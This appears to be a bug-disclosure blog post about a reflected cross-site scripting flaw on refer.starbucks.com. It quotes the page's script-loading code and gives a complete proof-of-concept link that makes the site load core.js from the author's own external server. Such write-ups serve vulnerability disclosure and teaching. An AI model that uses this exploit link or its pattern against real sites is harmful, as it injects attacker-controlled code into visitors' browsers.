Reflective XSS in refer.starbucks.com

I have found a reflective XSS vulnerability on http://refer.starbucks.com. Below are the details:

  1. Go to http://happymondays.starbucks.com, scroll down and click the “Invite a friend” button. You will be redirected to http://refer.starbucks.com/micro/microsite?source=redirect
  2. On http://refer.starbucks.com/micro/microsite?source=redirect there are three buttons, to “Spread the love“:

SHARE WITH EMAIL

SHARE ON FACEBOOK

SHARE ON TWITTER

Clicking on each of them generates a request like this:

GET /xd-arbiter?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4 HTTP/1.1

Host: refer.starbucks.com

Use of external server should immediately catch your attention – a quick look into the source code reveals a reflective XSS vulnerability:

var MEDIA_SERVER = queryArgs.mediaServer;
var CLIENT_ID = queryArgs.clientId;
var SOCKET_ID = queryArgs.socketId;
(…)
insertScript(MEDIA_SERVER + ‘/’ + CLIENT_ID + ‘/core.js’);

So we have a MEDIA_SERVER (“https://lubi.cz“), CLIENT_ID (“starbucks” folder), SOCKET_ID (whaterver) and a core.js file (“https://lubi.cz/starbucks/core.js” combined). To execute a payload just visit the following link:

http://refer.starbucks.com/xd-arbiter?mediaServer=https://lubi.cz&clientId=starbucks&socketId=1

 

Leave a Reply

Your email address will not be published. Required fields are marked *